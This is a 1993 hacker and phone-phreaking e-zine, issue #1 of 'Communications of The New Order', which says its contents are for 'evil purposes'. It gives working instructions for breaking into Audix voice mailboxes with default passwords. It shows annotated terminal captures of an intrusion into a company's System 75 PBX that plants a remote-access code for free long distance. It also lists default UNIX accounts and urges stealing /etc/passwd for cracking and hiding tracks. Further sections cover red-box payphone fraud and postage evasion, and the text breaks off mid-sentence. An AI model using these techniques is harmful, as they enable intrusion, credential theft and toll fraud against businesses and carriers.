       ______         ______     ____________       ____      ___     ______ 
      /  ____|\      /      \   |____    ____|\    /   | \  /   / |  /      \ 
    /  /  ____\|   /   __    |\  \_/   /|_____\| /     |  /   /  / /   __    |\ 
  /  /  /        /   /__/   /  | /   /  /      /   /|  |/   /  / /   /__/   / | 
/  /__/______   |         /  / /   /  /      /   /  |     /  /  |         /  / 
|____________|\ |\_____ /  / /__ /  /      /___/  / |___/  /    |\_____ /  / 
|_____________\| \|____| /  |___| /       |___ |/   |___|/       \|____| / 
 
                                   ____ 
                                  /    \ ---  
                                /        \   \ __   
                              /     /\     \   \  \    
                           _/______|_/    /   /   / \   
                          |          |  /   /   /  /  
                          |    ---\( |/   /   /  /  
                          |         \|\(/\(/ \(/     
                          |                   |    
                          /                  / 
                        /    \             / 
                      /         \     ___/ 
                                     /   
                                   /     
                                 /       
 
                      Communications of The New Order 
                                 Issue #1 
                               Summer, 1993 
 
                   "The best things in life are toll-free." 
                                                     AT&T 
 
 
             Editor......................................DeadKat 
             Cheerleader.................................Karb0n 
             Rebel without a pause.......................Panther Modern 
             Fund raiser.................................Cavalier 
             The K-radiest...............................Jewish Lightning 
             Flatline engineer...........................Nuklear Phusion 
              
             Thanks to:  Phreddy!, god, Control-C (the new one), Nitro-187, 
             RDT (you guys rule), VirtualCon (NOT!), Lucifer and the Coders, 
             Disk Jockey, Visionary, Kamikaze, John Falcon, Cosmos, Pee Wee, 
             and all the negligent system administrators of the world... 
 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
                           
                           
                           
                          ___/\/INTRoDUCTIoN\/\___ 
 
 
Welcome to CoTNo!  This publication is the prodigy of The New Order, Colorado's 
best hacking group.  We have created this 'zine to help teach what we have 
learned and discovered from our combined years of experience.  This is not 
intended to be an ultra-technical collection of barely useful information, but 
rather a forum for spreading current H/P/A knowledge and practices to the  
newer members of the 'scene'.  You will not find mind-numbing overly technical 
reports here.  Nor will you be wasting your time and hard-drive by downloading 
useless articals on non-H/P/A topics like gambling and car theft.  All articals 
contained in CoTNo have useful applications in today's heavily computerized 
and automated society.  Some well experienced hackers may find these texts to 
be old hat, but we feel the scene has been dying because of a lack of basic 
hacking tutorials.  The goal of the writers of this publication and the  
members of TNo is to educate and enlighten in order to recreate the booming 
scene of the 80's. 
 
The New Order (TNo) are the main writers and supporters of this 'zine.  We 
are composed of hackers, phreakers, and "hairy-eyed anarchists" from the 
Colorado area. We recently recieved some minor publicity in a comment found 
in The Seed Magazine: Denver's Rag of Underground Culture.  The following is 
an exerpt from the June/July '93 issue: 
 
     "Hackers - no longer a small underground phenomenon, these computer whiz- 
     kids have become a highly organized network of post-modern renegades. 
     With everything in our lives being computerised, today's hackers are able 
     to gain unbelievable access into just about everything.  They communicate 
     to each other via BBS (Bulletin Board System) and trade tips on everything 
     from music to ripping off the phone company.  The buzz around town is 
     about Flatline, a BBS run by the hacking crew, TNO." 
 
Not exactly the front page of Time, but at least this was a POSITIVE statement 
by the media on the hacking phenomenon. 
 
We accept submissions to CoTNo from anyone who has willingness to teach and 
can get on Flatline.  There will also be a CoTNo mailing address soon.  This 
mag' will be published on a quarterly basis. 
 
 
DISCLAIMER 
~~~~~~~~~~ 
This publication contains information pertaining to illegal acts.  The use 
of this information is intended solely for evil purposes.  The editors,  
writers, and publishers of this publication take no responsibility for any 
legal acts committed using this information.  If you plan on using this  
information for destructive purposes, read on.  Otherwise...FUCK OFF! 
 
 
 
 
TABLE OF CONTENTS 
~~~~~~~~~~~~~~~~~ 
 1.  CoTNo Introduction.......................................DeadKat 
 2.  How to Hack Audix VMB's..................................DeadKat 
 3.  System 75 Hacking (An Online Tutorial)...................Panther Modern 
 4.  UNiX Default List........................................TNO Hacking Crew 
 5.  HoW To MAiL FoR FREE.....................................Karb0n 
 6.  How to Red Box...........................................DeadKat 
 7.  Field Phreaking I........................................The Third Cartel 
 8.  Field Phreaking II.......................................The Third Cartel 
 9.  How to Make a ZAPPER GUN.................................Panther Modern 
10.  Comments on Phrack 42....................................Karb0n 
11.  CoTNo Conclusion.........................................DeadKat 
 
 
 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
 
                 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\  
                 (*)                                 (*)\|    
                 (*)            HOW TO HACK          (*)\| 
                 (*)               AUDIX             (*)\| 
                 (*)               VMB'S             (*)\| 
                 (*)                                 (*)\| 
                 (*)                By               (*)\| 
                 (*)            |>ead |<at           (*)\| 
                 (*)                                 (*)\| 
                 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\| 
                  \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\| 
                    
 
 
PREFACE 
------- 
 
        A VMB, in case you don't know, stands for Voice Mail Box.  A VMB works 
like a multiuser answering machine.  A company will puchase a VMB so its  
employees will be able to leave messages to each other.  Each employee will 
have a seperate box number assigned to him and be given a "default password" 
for his VMB.  The employee is then able to leave a greeting on his mail box 
and change the password.  Whenever someone calls him, they will get his VMB 
if he does not answer his line.  The caller can then leave a message to the 
employee. 
 
        Hackers and Phreaks steal VMB's so they can contact each other and  
spread information around.  You can give them to friends, you can trade them 
for access on boards, or keep them for yourself.  Some boxes even have the  
ability to call out so you can use them for phreaking! 
 
        The Audix or Audio Information Exchange system sold by AT&T is one of  
the better VMB's on the market.  It has many message options, it is highly  
configurable, and has many security options.  Lucky for us, it also has some  
neat options that make it very easy to hack! 
 
 
SCANNING FOR AUDIX VMB'S 
------------------------ 
 
        To find a VMB, you will have to scan.  Either pick a popular business 
exchange in your area code (like 669, 721, 220, etc.), or try the riskier 800  
area code.  The 800 area code VMB's are better but Ma Bell's computers (ESS)  
keep a list of any number that makes excessive calls to 800 numbers.  Do your 
scanning at night so you won't have to worry about reaching someone at their 
desk.  Start at 0000 and work your way to 9999 sequentially.  Write down any  
interesting numbers you find.  If you get some kind of answering machine, mark 
it as a possible VMB. 
 
        When your done scanning, recall each of the possible VMB's.  Some  
Audix systems will answer with the greeting "Welcome to Audix..." while others 
will just begin with the employee's greeting.  Press *7 (the asterick then the 
seven).  You will here "Welcome to Audix..." if it is an Audix VMB. 
 
 
WHAT TO DO ONCE YOU FIND ONE 
---------------------------- 
 
        Now that you have a list of Audix VMB numbers, call one of them and 
get yourself a box!  When you first reach a box, you are in record mode.  You 
have a number of options available to you in this mode: 
 
                KEY             ACTION 
                ---             ------ 
                1               Begin recording. 
                1               Stop recording. 
                *#              Approve message. 
                *1              Review message. 
                *3              Delete message. 
                2               Rewind message. 
                3               Playback message. 
                6               Advance message a few seconds. 
                5               Replay the last few seconds. 
                4               Turn volume up. 
                7               Turn volume down. 
                8               Slow down message. 
                9               Speed up message. 
 
You also have the following Audix master functions available to you: 
 
                KEY             FUNCTION 
                ---             -------- 
                *R              To retrieve a box. 
                *H              To get help at any time. 
                *T              To transfer to another box. 
                *W              To have the system wait. 
                **N             To access the directory. 
 
 
        To get your own box, you must first find some empty boxes.  While you 
are in record mode, press *T.  The system will tell you to enter either a  
three or four number digit number extension and the pound sign.  Remember 
how many digits the box numbers are.  Now press **N. This will take you to the  
directory.  Press *A to look up boxes by their extension.  Start scanning for 
boxes sequentially.  Start at either the highest number or lowest number (999 
or 000) and work your way to the other end.  To scan a box number, enter the 
box number and press the pound sign.  You will hear one of three responses: 
 
        1.  The name of the box owner. 
        2.  "Box number XXX is not a valid box". 
        3.  "Box number XXX". 
 
If you hear either response one or response two, go on to the next box.  If  
you hear response 3, BINGO!  You just found an empty box so write it down and 
move on to the next box.  After you are finished scanning, press *#. 
 
 
HOW TO BREAK INTO AN EMPTY BOX 
------------------------------ 
 
        While in record mode, press *R.  You will here a message like "Welcome 
to the Audix Activity Menu..."  Enter one of the empty box numbers you found 
and press the #.  It will now tell you to enter your password and press the #. 
The password will be a three or four digit combination of numbers. The default  
password is usually something obvious so try some of the following: 
 
                   PASSWORD            NOTE 
                   --------            ---- 
                   Box Number          This is the most common  
                   No password         Just press pound, also common 
                   1234                \ 
                   9999                  > Occasionally 
                   1111                / 
 
Once you figure out the default password for one empty box, you can access all 
the boxes you found during your scan by using the default. 
 
 
WHAT TO DO ONCE YOU'RE IN 
------------------------- 
 
        You will know when you have broken into a box when you hear a message 
like "Extension XXX, you have no new messages."  You can now set up your  
personal box.  The following is a list of the functions available to you: 
 
                KEY             FUNCTION 
                ---             -------- 
                 1              Create a message. 
                 2              Retrieve messages left for you. 
                 3              Change your greeting. 
                 4              Check out messages left by you.               
                 5              Change password. 
                 6              Change call notification information. 
                **R             Relog into your box. 
                **N             Enter the directory. 
 
The first thing you should do is change your password!  You don't want  
anybody to hack YOUR box. 
 
 
ADVANCED AUDIX 
-------------- 
 
        Sometimes you will find boxes that have no name, but don't have a  
default.  Transfer to the box and check it out.  It might be a carrier. 
Audix's are usually found on System 75/85 PBX's which can be accessed via 
modem.  Call it with your modem and if you get a prompt that looks like  
Logon: you have scored big.  A tutorial on hacking System 75/85's can be 
found elswhere in this 'zine. 
 
If you transfer to the box and you hear a quick beep without hearing any type 
of greeting, you have found a bridge.  Have a friend call the system and 
transfer to the same box after you have and see if you can talk to each  
other.  All System 75/85's have the capability to bridge extensions but this 
option is rarely used.  If you find a bridge, only call it late at night so 
you don't stumble into valid conference. 
 
                                         
CONCLUSION 
---------- 
 
        You should be a master at hacking Audix VMB's now.  You can use many  
similar techniques on other brands of VMB's too.  Be conservative with your 
boxes.  The more boxes you snag from one company, the more likely they will 
notice you and shut you out.  If you do end up with 500 boxes, use them to  
trade with.  You can get better access on boards, money, or equipment for  
them.  Have Phun! 
__________________________________________________________________________ 
(C)opywrong 1993, DeadKat Inc. 
All wrongs denied. 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>                      
 
 
 
 
                          /\/System 75 hacking\/\ 
                          /\/An online tutorial\/\ 
      -=Captured from a very generous company located in Denver=- 
           -=My thanks go out to them for use of their PBX=- 
                  --Intro by Panther Modern TNO/TBF-- 
          --Hacking of the system by Panther Modern TNO/TBF-- 
                --Editing and revising from |>ead|<at-- 
  >Special thanks to Dead Kat for teaching me how to do this stuff..< 
 
   
INTRO 
~~~~~ 
  System 75/85's..The gateway to the world of the PBX...If one can hack these  
machines, one has the ability to generate many codes for himself, and his  
fellow phreakers/hackers to use and enjoy.  Hacking these machines can be  
very fun, but if one does not know what he's doing, it could be frustrating  
and potentially risky. That's why I am writing this text.  This file includes  
captures from two hacks I did.  In the first hack, I will show you how I went  
thru, saw that the company did not have a PBX, and made my own for my own  
personal gateway to free LD.  In the second hack you will see how I simply  
looked, saw the PBX, and quickly found the correct trunk, changing nothing.   
   
  Version 2 is definately the better way to hack a system.  If you change  
things, it will show up on the system log.  Along comes a system  
administrator to read the log, and yer busted.  But if you don't change  
anything, no one will ever know you were there...Of course, many times, it  
becomes nescessary to change things, if the company dosn't already have a PBX  
installed...You must make your own.  For ease of reading, I have gone thru  
and edited/commented on everything I did in both hacks.  Hopefully I made  
it easy to understand..Good luck hacking System 75! 
 
                  
CONVENTIONS USED IN THIS ARTICAL 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
1.  The command prompt is 
     enter command: 
 
2.  Resulting screens begin and end with dashes.                 
 
3.  Comments are inclosed by brackets. [ ] 
 
4.  Emulation is Bell 513. 
 
 
THE FIRST HACK 
~~~~~~~~~~~~~~ 
CARRIER 1200   
[1200 baud is a good way to recognise a sys75] 
 
KEYBOARD LOCKED, WAIT FOR LOGIN 
Login: XXXXX 
Password: XXXXXXX 
[I don't want to include any passwords in this file] 
Terminal Type (513, 4410, 4425): [513] 
[513 is a default bell prefix.  It is about the same as VT100] 
 
 
___________________________________________________________________________ 
                         
                         
                         
                        Copyright (c) 1986 - AT&T 
                   Unpublished & Not for Publication 
                          All Rights Reserved 
 
 
 
___________________________________________________________________________ 
[I like this screen...<G>] 
  
  
 enter command: display rem<< 
[All you really need is DIS, not display.  Try DIS HELP, also, LIST HELP] 
____________________________________________________________________________ 
display remote-access                                           Page  1 of  1 
                                REMOTE ACCESS 
                
                
               Remote Access Extension: 
                   Barrier Code Length: 4 
BARRIER CODE ASSIGNMENTS (Enter up to 10) 
         
        Barrier Code    COR                    Barrier Code    COR 
     1:                 1                    6:                 1 
     2:                 1                    7:                 1 
     3:                 1                    8:                 1 
     4:                 1                    9:                 1 
     5:                 1                    10:                1 
 
 
____________________________________________________________________________ 
[As you can see, no remote access ports are set up.  No PBX, and no codes. 
Code length is four digits.] 
 
 
 enter command: dis trunk 1 
[we will now look at all 99 trunks, to find the rite one to use..] 
_____________________________________________________________________________ 
 
display trunk-group 1                                           Page  1 of  5 
                                TRUNK GROUP 
 
Group Number: 1                    Group Type: co            SMDR Reports? y 
  Group Name: main pool                   COR: 1                      TAC: 76 
   Direction: two-way        Outgoing Display? n         Data Restriction? n 
 Dial Access? y                Busy Threshold: 60           Night Service: 
Queue Length: 0                                      Incoming Destination: 200 
   Comm Type: voice                                 Digit Absorption List: 
    Prefix-1? n                   Restriction: toll    Allowed Calls List? n 
 
TRUNK PARAMETERS 
            Trunk Type: loop-start 
    Outgoing Dial Type: tone 
     Trunk Termination: rc                    Disconnect Timing(msec): 500 
        ACA Assignment? n 
                                                    Maintenance Tests? y 
 Answer Supervision Timeout:                    Suppress # Outpulsing? n 
_____________________________________________________________________________ 
[First we look at night service, and incoming destination, recording the 
numbers to hardcopy.  We also note the trunk type, and COR number] 
 
 
[We type <ESC>[U to get to the next page of text.] 
_____________________________________________________________________________ 
display trunk-group 1                                             Page  2 of  5 
                                  
                                 TRUNK GROUP  
 
GROUP MEMBER ASSIGNMENTS 
                  
                 Port      Name         Mode         Type    Answer Delay 
              1: A0301    xxxxxxx 
              2: A0302    xxxxxxx 
              3: A0303    xxxxxxx 
              4: A0304    xxxxxxx 
              5: A0305    xxxxxxx 
              6: A0306    xxxxxxx 
              7: A0307    xxxxxxx 
              8: A0308    xxxxxxx 
              9: A0401    xxxxxxx 
             10: A0402    xxxxxxx 
             11: A0403    xxxxxxx 
             12: A0404    xxxxxxx 
             13: A0405    xxxxxxx 
             14: A0406    xxxxxxx 
             15: A0407    xxxxxxx 
____________________________________________________________________________ 
[Where name is, there will be fone numbers.  Record these so you will know 
what number to dial in to while hacking.  I have removed the numbers for 
security reasons.] 
[Same process was done on the remaining trunks.  Always scan all 99, even 
if you stop finding some.  There may be a good one...] 
[If the trunk has both a night extension and a phone number listed on page 
2, make a note of it.  Use the command dis cor to see the the trunks 
restrictions.  FRL should equal 7.  If not, change it to 7 or find another 
trunk.] 
[BTW - When done looking thru pages, type <ESC>Ow to return to prompt] 
[What we found was a trunk which looked as if it was fairly unimportant. 
Also, it didn't have a night extension.  This is important, because we want 
to set up an after-hours PBX.  If we take over a daytime extension, the PBX 
would most likely go down within 24 hours.] 
[If, under the name column, there are strange numbers, like AT204, just  
disregard them, and go on to the next trunk, these are internal extension 
numbers.] 
 
 
 enter command: dis dial<< 
[This displays the dial plan for the system.  It will show you which digit 
to start your remote extension (shown later) with.  Use a digit that says 
EXTENSION.  As you can see, that digit here is 2.] 
____________________________________________________________________________ 
display dialplan                                                  Page  1 of  1 
                                
                                
                               DIAL PLAN RECORD 
                             Area Code: XXX 
                 ARS Prefix 1 Required? y 
                  Uniform Dialing Plan? n 
 
FIRST DIGIT TABLE 
Digit  Identification   Number of       Digit  Identification   Number of 
                        Digits                                  Digits 
    1: fac                3               7: tac                  2 
    2: extension          3               8: tac                  1 
    3:                    0               9: fac                  1 
    4:                    0               0: attendant            1 
    5:                    0               *: fac                  2 
    6: tac                2               #: fac                  2 
 
_____________________________________________________________________________  
  
  
 enter command: dis allow 
[This will display the allowed calls/area codes.  If your PBX does not work 
later on, check here, and try to add the correct area code you want to call] 
 
___________________________________________________________________________ 
display allowed-calls                                             Page  1 of  1 
                    
                   ALLOWED CALLS LIST (FOR TOLL RESTRICTION) 
AREA/LONG DISTANCE CARRIER CODES ( Enter up to 10 ) 
          
         1: 800                         6: 
         2: 911                         7: 
         3: 950                         8: 
         4:                             9: 
         5:                            10: 
 
 
____________________________________________________________________________ 
[This system can call 800's, 950's, 911, as well as long distance numbers.] 
 
 
 enter command: list help 
____________________________________________________________________________ 
Please enter one of the following object command words: 
 
abbreviated-dialing      groups-of-extension      personal-CO-line 
aca-parameters           hunt-group               pickup-group 
bridged-extensions       intercom-group           station 
configuration            measurements             term-ext-group 
coverage                 modem-pool               trunk-group 
data-module              performance 
Or press CANCEL to cancel the command 
  Object command word omitted; please press HELP 
 
 
____________________________________________________________________________ 
[List is similar to DIS, except that none of it's factors can be changed.] 
 
 
 enter command: list groups-of-extension 200 
[We are attempting to find an empty extension to set up the remote on.  Find 
an extention that is not being used and write it down.  The screens have been 
omitted for brevity's sake.] 
[We will now set up a remote extension.] 
  
 enter command: list group 299< 
 
list groups-of-extension 299 
  Extension not assigned 
[We first found an empty extension] 
 
 enter command: ch rem< 
[we proceeded to add it to the remote access.  I will put {'s around what 
we added.] 
____________________________________________________________________________ 
change remote-access                                              Page  1 of  1 
                                 
                                REMOTE ACCESS 
 
               Remote Access Extension: {299} 
                   Barrier Code Length: 4 
BARRIER CODE ASSIGNMENTS (Enter up to 10) 
         
        Barrier Code    COR                    Barrier Code    COR 
     1: {3323}          1                    6:                 1 
     2:                 1                    7:                 1 
     3:                 1                    8:                 1 
     4:                 1                    9:                 1 
     5:                 1                   10:                 1 
   
  Command successfully completed 
_____________________________________________________________________________ 
[We added in our code, and our remote access extension, and then save 
by typing <ESC>SB ]   
[We added our extension, and our code (barrier code)]  
 
 
 enter command: dis trunk 9<< 
[We looked back on our hardcopy notes, and decided that trunk 9 would be  
appropriate to add our code to.  We re-display just to make sure] 
____________________________________________________________________________ 
display trunk-group 9                                             Page  1 of  5 
                                 
                                TRUNK GROUP 
 
Group Number: 9                    Group Type: co            SMDR Reports? y 
  Group Name: fax wild line               COR: 1                      TAC: 79 
   Direction: two-way        Outgoing Display? n         Data Restriction? n 
 Dial Access? y                Busy Threshold: 60           Night Service: 
Queue Length: 0                                      Incoming Destination: 267 
   Comm Type: voice                                 Digit Absorption List: 
    Prefix-1? n                   Restriction: code 
 
TRUNK PARAMETERS 
            Trunk Type: loop-start 
    Outgoing Dial Type: tone 
     Trunk Termination: rc                    Disconnect Timing(msec): 500 
        ACA Assignment? n 
                                                    Maintenance Tests? y 
 Answer Supervision Timeout:                    Suppress # Outpulsing? < 
display trunk-group 9 
  Command aborted 
____________________________________________________________________________ 
 
 
 enter command: ch trunk 9 
[Once again, changes I made will be in {'s] 
____________________________________________________________________________ 
change trunk-group 9                                              Page  1 of  5 
 
                                TRUNK GROUP 
 
Group Number: 9                    Group Type: co            SMDR Reports? y 
  Group Name: fax wild line               COR: 1                      TAC: 79 
   Direction: two-way        Outgoing Display? n         Data Restriction? n 
 Dial Access? y                Busy Threshold: 60           Night Service: {299} 
Queue Length: 0                                      Incoming Destination: 267 
   Comm Type: voice                                 Digit Absorption List: 
    Prefix-1? n                   Restriction: code 
 
TRUNK PARAMETERS 
            Trunk Type: loop-start 
    Outgoing Dial Type: tone 
     Trunk Termination: rc                    Disconnect Timing(msec): 500 
        ACA Assignment? n 
                                                    Maintenance Tests? y 
 Answer Supervision Timeout:                    Suppress # Outpulsing? n 
  Command successfully completed 
____________________________________________________________________________ 
[All we had to do was add our remote extension to Night Service] 
[..And save it with <ESC>SB ] 
[You should now have a ready-to-use PBX!!!!!!  Check page 2, that's yer after  
hours dial in number.] 
  
 
 enter command: dis trunk 9 
[We check again to make sure our changes came thru correctly] 
____________________________________________________________________________ 
display trunk-group 9                                             Page  1 of  5 
                                 
                                TRUNK GROUP 
 
Group Number: 9                    Group Type: co            SMDR Reports? y 
  Group Name: fax wild line               COR: 1                      TAC: 79 
   Direction: two-way        Outgoing Display? n         Data Restriction? n 
 Dial Access? y                Busy Threshold: 60           Night Service: 299 
Queue Length: 0                                      Incoming Destination: 267 
   Comm Type: voice                                 Digit Absorption List: 
    Prefix-1? n                   Restriction: code 
 
TRUNK PARAMETERS 
            Trunk Type: loop-start 
    Outgoing Dial Type: tone 
     Trunk Termination: rc                    Disconnect Timing(msec): 500 
        ACA Assignment? n 
                                                    Maintenance Tests? y 
 Answer Supervision Timeout:                    Suppress # Outpulsing? < 
display trunk-group 9 
  Command aborted 
____________________________________________________________________________ 
[everything's great!] 
  
 enter command: logoff 
[Sooooooooo.....We logoff...] 
[To use yer PBX, just dial in, and type: 
  <YER CODE>+9+1+ACN!! 
  Or to set up an alliance, replace the 1 with a 0...] 
 
 
THE SECOND HACK 
~~~~~~~~~~~~~~~ 
[I started this capture a little late, after I had already looked through 
a few things.  It still gets the point across, tho.  It displays going 
thru, and not changing ANYTHING!] 
 
 
 enter command: dis rem 
[I look at the remote...] 
____________________________________________________________________________ 
display remote-access                                             Page  1 of  1 
 
                                REMOTE ACCESS 
                
               Remote Access Extension: 599 
                   Barrier Code Length: 5 
           Authorization Code Required? n 
 
BARRIER CODE ASSIGNMENTS (Enter up to 10) 
        Barrier Code    COR COS                Barrier Code    COR COS 
     1: 52290           1   1                6:                 1   1 
     2: 11111           1   1                7:                 1   1 
     3:                 1   1                8:                 1   1 
     4:                 1   1                9:                 1   1 
     5:                 1   1               10:                 1   1 
 
____________________________________________________________________________ 
[I see that there are 2 codes and an extension already set up.  I am wary  
of code number 2..It could be a trap code] 
  
 
 enter command: dis trunk 7 
____________________________________________________________________________ 
display trunk-group 7                                             Page  1 of  9 
 
                                TRUNK GROUP 
 
Group Number: 7                   Group Type: co            SMDR Reports? y 
  Group Name: REMOTE ACCESS              COR: 63                     TAC: 707 
   Direction: two-way       Outgoing Display? n 
 Dial Access? y               Busy Threshold: 10           Night Service: 599 
Queue Length: 0                                     Incoming Destination: 0 
   Comm Type: voice                Auth Code? n    Digit Absorption List: 
    Prefix-1? n                  Restriction: code 
                                 Trunk Flash? n 
TRUNK PARAMETERS 
            Trunk Type: ground-start 
    Outgoing Dial Type: tone 
     Trunk Termination: rc                    Disconnect Timing(msec): 500 
     Terminal Balanced? n                               RA Trunk Loss: 0db 
 Answer Supervision Timeout: 10            Receive Answer Supervision? < 
display trunk-group 7 
  Command aborted 
____________________________________________________________________________ 
[I see that trunk 7 already has the extension ready to use!!!!!!!!] 
[FREE LD and no changes!  They will not know I was ever there!!!] 
[I look at page's 2 and 3 for the fone numbers to dial in to, and then 
I'm OUTTA THERE!!!] 
 
 enter command: logoff 
 
    --I hope these captures helped.. 
              --Panther Modern TNO/TBF 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
 
 
                    /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ 
                   *|     The TNO Hacking Crew Presents   |* 
                   *|                                     |* 
                   *|            UNiX Defaults            |* 
                    \                                     / 
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
INTRO 
~~~~~ 
This a list compiled by the members of The New Order from frequent visits to 
UNiX hosts.  These are default accounts/passwords observed in hosts running 
UNiX variations including System V, BSD, Xenix, and AiX.  These defaults are 
included in standard setup on various machines so the Sysadmin can log on 
for the first time.  Often the negligent Sysadmin forgets to delete or pass- 
word the accounts.  This makes UNiX machines extremely easy to infiltrate. 
This artical does not go into specifics of hacking but it is highly 
suggested that you immediately copy the /etc/passwd file (/etc/security/ 
passwd in AiX machines!) so you can later run a dictionary hacker and get 
some other accounts and insure your access.  This is list of default 
accounts which are often unpassworded.  If the system asks for a password, 
try the account name which sometimes works. 
 
 
DEFAULTS 
~~~~~~~~ 
root                         bin                     adm 
makefsys                     sysadm                  sys 
mountfsys                    rje                     sync 
umountfsys                   tty                     nobody 
checkfsys                    somebody                setup 
lp                           powerdown               ingres 
dptp                         general                 guest 
daemon                       gsa                     user 
trouble                      games                   help 
nuucp                        public                  unix 
uucp                         test                    admin 
student                      standard                pub 
field                        demo                    batch 
visitor                      listen                  network 
uuhelp                       usenet                  sysinfo 
cron                         console                 sysbin 
who                          root2                   startup 
shutdown                     ncrm                    new 
 
 
CONCLUSION 
~~~~~~~~~~ 
Have phun but be careful!  Learn what to do before you run out and invade 
some systems.  These won't do you any good if you can't hide your tracks. 
Hacking is all about learning about cool stuff, but you can't hack until  
you learn how.  Njoy. 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
 
                            HoW To MAiL FoR FREE 
                                 BY KARB0N 
                                  -=TNO=- 
 
 
        Postal chislers used to mail letters unstamped in the knowledge  
that they would be delivered anyway... with "Postage Due"to the recipient. 
It took a stingy person to mail personal letters this way, but many people  
did send mail this way on bill payments. So the Post Office changed it's  
policy. It stopped delivering letters without stamps. But a letter with a 
stamp.. even a one cent stamp...is delivered postage due if need be. A letter 
with no stamp is returned to the sender. 
 
        Naturally, this has just opened up a new way pf cheating. Letters can 
now be mailed for free by switching the positions of the delivery address and 
the return address. If there is no stamp on the envelope, it will be Returned 
to the address in the upper left corner.. which is where you want it to go in 
the first place. Unlike the old system, the letter is not postage-due. At 
most the recipient gets a stamped purple reminder that "The Post Office does 
not deliver mail without postage." 
 
        At least one large company seems to have adapted this principle to  
it's billing. Citibank bases it's MasterCard operations in Sioux Falls, South 
Dakota. The bill payment envelopes have the Citibank Sioux Falls address in 
both the delivery address and return address positions. (Most bill payments 
envelopes have three lines for the customer to write in his or her return 
address.) Therefore, regardless of whether the customer puts a stamp on the 
envelope, it is delivered to Citibank. (The return-address gimmick works even 
when the return address is in a different state from the mailing point.) 
 
        Who is cheating whom? If the customer puts correct postage on the 
envelope, it is delivered to Sioux Falls at the customer's expense. No one 
is slighted. If, on the other hand, the customer intentionally omits the 
stamp, the payment is delivered at Post Office expense. Then the customer has 
cheated the Post Office. The Post Office also loses out if the customer 
honestly forgets to put a stamp on the envelope. But then blame ought to be  
shared with the peculiar design of Citibank's envelope. 
 
        Citibank's motive is plain: If the envelopes are returned to forgetful 
customers, it delays payment. 
 
 
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo> 
 
 
 
 
                    (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\ 
                    (*)                                 (*)\| 
                    (*)           |>ead|<at             (*)\| 
                    (*)            presents             (*)\| 
                    (*)                                 (*)\| 
                    (*)         HOW TO RED BOX          (*)\| 
                    (*)                                 (*)\| 
                    (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\| 
                     \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\| 
 
 
INTRO 
^^^^^ 
Red boxing has quickly become Colorado's elite game of choice.  Ever since 
I dug up the 2600 plans and passed them out, it seems like every phreak in  
Colorado has built one.  Many questions, though, have arisen.  To hopefully 
cut down on my e-mail, I present here the complete guide to using red boxes. 
 
 
CHOOSING A PAY PHONE 
^^^^^^^^^^^^^^^^^^^^ 
This is the simplest part of red boxing.  You must use an authentic U.S.  
West (or other Baby Bell) payphone.  If the phone does not say U.S. West 
or have the bell symbol somewhere on it, it is a COCOT and cannot be boxed. 
 
 
LONG DISTANCE 
^^^^^^^^^^^^^ 
The most common reason for building a red box is of course to make long 
distance calls.  This is also the easiest way to use them.  To make the  
call just dial: 
 
                      1 + Area Code + Number 
 
You will then here a computer voice ask you to deposit an amount of money. 
Make the quarter tones until you hear the voice say "Thank you". 
 
 
LONG DISTANCE WITHIN AN AREA CODE 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
This is a little bit trickier.  Normally, U.S. West handles any calls within  
an area code.  Unfortunately, U.S. West switching systems are not fooled by 
red box tones.  To get around this inconvenience, you must route your call 
through a long distance carrier.  You must first decide which carrier you  
want to skam.  Here is a list of some of the major carriers available in 
Colorado and their equal access codes. 
 
AT&T         10288 or 10732 
MCI          10222 or 10888 or 10789 
Sprint       10333 
Metromedia   10488 or 10999 
Encore       10805 or 10555 
Allnet       10444 
Tel. Xpress  10465 
ACI          10244 
U.S. Tel.    10471 
LDDS         10001 
One 2 One    10390 
 
To make the call dial: 
 
                    Access Code + 1 + Area Code + Number 
 
Once again you will be told to deposit money, feed 'em the quarter tones. 
 
 
LOCAL 
^^^^^ 
To make a local call, you must also route the call through a long distance 
carrier.  To make the call, dial: 
 
                          Access Code + Number 
 
Thats it!  You will be told to deposit money as usual so unleash the tones. 
                        
 
DURING THE CALL 
^^^^^^^^^^^^^^^ 
If your call is over five minutes, you will hear a click at that time.  This 
means you have spent all your money and are running on credit.  Two minutes 
later you will be cut off temporarily and you will hear the computer ask you 
for some more money.  Deposit tones until you hear the voice say "Thank you". 
Remember, the party you are calling will here the tones as well.  After you 
have "paid" you will be reconnected to your party. 
 
 
AFTER THE CALL 
^^^^^^^^^^^^^^ 
When you are done, push the reciever down for a few seconds then let off and  
listen.  If you went over your time, the computer voice will come on and ask  
you to pay the amount you went over.  Pay with tones as usual.  If you just 
hang up, the phone will ring and there will be an operator on the other end 
asking for money.  Don't use the red box if you are talking to an operator. 
Either pay with real money or take off. 
 
 
CONCLUSION 
^^^^^^^^^^ 
Red boxing is phun and easy as long as you know what you are doing.  Memorize 
those access codes (or at least one) and you will be good to go.  I have  
